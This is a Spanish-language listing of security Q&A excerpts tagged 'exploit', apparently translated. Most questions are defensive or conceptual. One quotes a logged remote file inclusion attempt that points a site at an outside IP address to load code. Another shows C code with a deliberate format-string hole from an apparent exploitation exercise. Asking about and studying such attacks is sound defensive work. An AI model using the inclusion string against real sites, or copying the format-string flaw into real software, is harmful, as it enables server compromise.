Preguntas con etiqueta 'exploit'

3
respuestas

¿Ataque de raíz del servidor?

Alguien en Hungría intentó algo extraño recientemente: /?_SERVER[DOCUMENT_ROOT]=http://94.199.51.7/readme.txt? Esta es la URL parcial de mi registro, que muestra la página a la que fueron. Dieron la URL de mi sitio como referente. ¿Qué...
hecha 06.04.2013 - 13:08
2
respuestas

Cómo explotar el valor de la variable

Estoy intentando explotar un archivo binario que tengo acceso al código fuente. int flag = 0; int main() { char buf[0x50]; puts("Who are you? "); printf("> "); fgets(buf, 0x50, stdin); printf(buf); if (flag == 1337...
hecha 01.12.2017 - 02:16
1
respuesta

¿Cómo asegurar un enrutador / módem? [cerrado]

Encontré muchos recursos sobre cómo proteger las redes WiFi. Esta pregunta no es sobre eso. ¿Cómo puedo asegurarme de que el software que se ejecuta en el módem / enrutador no se pueda explotar con fallas de seguridad conocidas? Encontré infor...
hecha 01.11.2016 - 20:03
1
respuesta

HTTPonly cookies

Me asignaron la tarea de realizar una exploración en un laboratorio y Nessus devolvió una vulnerabilidad de "Divulgación de información de cookies http: solo el servidor HTTP Apache". Lo que me gustaría saber es qué contienen estas cookies y cóm...
hecha 11.07.2015 - 14:23
2
respuestas

¿Existen métodos para determinar la explotabilidad de los errores, después de que se detecte un fallo en la confusión?

He encontrado esto, enlace Dice que solo "un análisis completo de la causa raíz puede garantizar que usted haya diagnosticado correctamente si una falla dada es explotable". ¿Es posible realizar dicho análisis sin acceso al código fuente? C...
hecha 21.03.2015 - 07:35
1
respuesta

Asegurando un sitio: ¿Diversidad sobre la simplicidad?

Esta pregunta se derivó de mi pregunta fuera de tema aquí: ¿La centralización disminuye la probabilidad pero aumenta el daño de las hazañas? Como antes, sospecho que esto puede ser demasiado abstracto como una pregunta. Pero las excelentes...
hecha 15.07.2013 - 21:08
2
respuestas

Tomando acción para intentos de explotación

Recientemente, he visto que he recibido aproximadamente 40 aciertos en un segundo para la siguiente identificación de la regla de Snort 1: 16008 , que corresponde al CVE-2007- 6239 : "... permite a los atacantes remotos causar una denegación d...
hecha 25.09.2012 - 14:01
3
respuestas

Comprobar si una aplicación web utiliza componentes vulnerables conocidos

He estado investigando sobre las 10 principales vulnerabilidades de las aplicaciones web de OWASP, una de ellas es usando componentes con saber vulnerabilidades . Estoy un poco confundido aquí, ya que no entiendo cómo podría verificar una aplic...
hecha 22.11.2017 - 22:46
1
respuesta

Metasploit no está detectando el exploit Python recién importado

He agregado OpenSSH 7.2p2 - Username Enumeration exploit a Metasploit, que es un exploit de python. Pero después de eso, no detecta que explote todas las formas que he intentado. Lo he colocado en el directorio /.msf4/modules/exploi...
hecha 30.10.2018 - 21:33
1
respuesta

¿Existe una estimación de la cantidad de días cero que hay?

   Una vulnerabilidad de día cero se refiere a un agujero en el software que se desconoce   al vendedor. Dado que, las vulnerabilidades de día cero son desconocidas, ¿se puede hacer una estimación de las cantidades? ¿Cuáles son los escenario...
hecha 19.03.2017 - 23:01